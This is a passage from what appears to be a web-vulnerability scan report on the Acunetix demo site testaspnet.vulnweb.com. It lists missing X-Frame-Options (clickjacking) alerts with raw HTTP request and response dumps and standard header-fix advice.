N1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKP1p3RBAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2FM3rUCxcfpdy3AdSqGMGh3aLpuYg%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 22723
          
          
          Response body (22723 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        21. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (414 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Content-Length: 10975
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10975 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 30429
          
          
          Response body (30429 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
